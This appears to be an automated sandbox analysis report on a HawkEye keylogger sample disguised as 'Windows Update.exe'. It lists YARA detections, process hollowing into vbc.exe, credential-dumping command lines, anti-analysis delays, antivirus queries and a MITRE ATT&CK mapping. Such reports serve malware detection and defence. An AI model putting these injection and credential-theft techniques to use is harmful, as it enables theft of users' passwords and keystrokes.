                          Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: GetAdaptersInfo,2_2_00642E9A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: GetAdaptersInfo,2_2_00642E72
                          Source: C:\Users\user\Desktop\Sample_B.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\Sample_B.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 180000
                          Source: C:\Users\user\Desktop\Sample_B.exe TID: 284 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\Sample_B.exe TID: 2028 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2504 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2312 | Thread sleep time: -1020000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2908 | Thread sleep time: -120000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2888 | Thread sleep time: -140000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2920 | Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2912 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2912 | Thread sleep time: -1400000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2460 | Thread sleep time: -180000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                          Source: Sample_B.exe, 00000000.00000002.2075920870.00000000004FB000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process queried: DebugPort
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process queried: DebugPort
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\Sample_B.exe | Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion:

                          .NET source code references suspicious native API functions
                          Source: Sample_B.exe, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: Sample_B.exe, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: Windows Update.exe.0.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: Windows Update.exe.0.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: WindowsUpdate.exe.2.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: WindowsUpdate.exe.2.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Allocates memory in foreign processes
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                          Sample uses process hollowing technique
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                          Writes to foreign memory regions
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                          Source: C:\Users\user\Desktop\Sample_B.exe | Process created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                          Source: C:\Users\user\Desktop\Sample_B.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information:

                          Yara detected HawkEye Keylogger
                          Source: Yara match | File source: Sample_B.exe, type: SAMPLE
                          Source: Yara match | File source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
                          Yara detected MailPassView
                          Source: Yara match | File source: Sample_B.exe, type: SAMPLE
                          Source: Yara match | File source: 00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara match | File source: 0.2.Sample_B.exe.c1fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.c1fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.f3fa72.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.f3fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.3377e00.7.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.3377e00.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.3.Windows Update.exe.54aec22.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Yara detected WebBrowserPassView password recovery tool
                          Source: Yara match | File source: Sample_B.exe, type: SAMPLE
                          Source: Yara match | File source: 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc9c0d.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.36114d0.8.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.36114d0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc9c0d.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee9c0d.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee9c0d.4.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE

                          Remote Access Functionality:

                          Detected HawkEye Rat
                          Source: Sample_B.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                          Source: Sample_B.exe | String found in binary or memory: HawkEyeKeylogger
                          Source: Sample_B.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                          Source: Sample_B.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                          Source: Windows Update.exe | String found in binary or memory: HawkEyeKeylogger
                          Source: Windows Update.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp | String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                          Source: Sample_B.exe | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Sample_B.exe | String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Sample_B.exe | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Sample_B.exe | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Yara detected HawkEye Keylogger
                          Source: Yara match | File source: Sample_B.exe, type: SAMPLE
                          Source: Yara match | File source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
                          Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 0_2_005D0DBA bind | 0_2_005D0DBA
                          Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 0_2_005D09AA listen | 0_2_005D09AA
                          Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 0_2_005D096C listen | 0_2_005D096C
                          Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 0_2_005D0D87 bind | 0_2_005D0D87
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 2_2_006409AA listen | 2_2_006409AA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 2_2_00640DBA bind | 2_2_00640DBA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 2_2_0064096C listen | 2_2_0064096C
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 2_2_00640D87 bind | 2_2_00640D87

                          Mitre Att&ck Matrix

                          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                          Replication Through Removable Media1 | Windows Management Instrumentation21 | Registry Run Keys / Startup Folder1 | Access Token Manipulation1 | Disable or Modify Tools1 | Input Capture21 | Peripheral Device Discovery1 | Replication Through Removable Media1 | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                          Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection411 | Deobfuscate/Decode Files or Information11 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Input Capture21 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                          Domain Accounts | Shared Modules1 | Logon Script (Windows) | Registry Run Keys / Startup Folder1 | Obfuscated Files or Information31 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                          Local Accounts | Command and Scripting Interpreter2 | Logon Script (Mac) | Logon Script (Mac) | Software Packing11 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software1 | SIM Card Swap |  | Carrier Billing Fraud
                          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Security Software Discovery31 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol2 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion4 | Cached Domain Credentials | Virtualization/Sandbox Evasion4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol12 | Jamming or Denial of Service |  | Abuse Accessibility Features
                          External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Process Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection411 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories1 | /etc/passwd and /etc/shadow | System Network Configuration Discovery11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

                          Behavior Graph

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          Source | Detection | Scanner | Label
                          Sample_B.exe | 100% | Avira | TR/AD.MExecute.lzrac
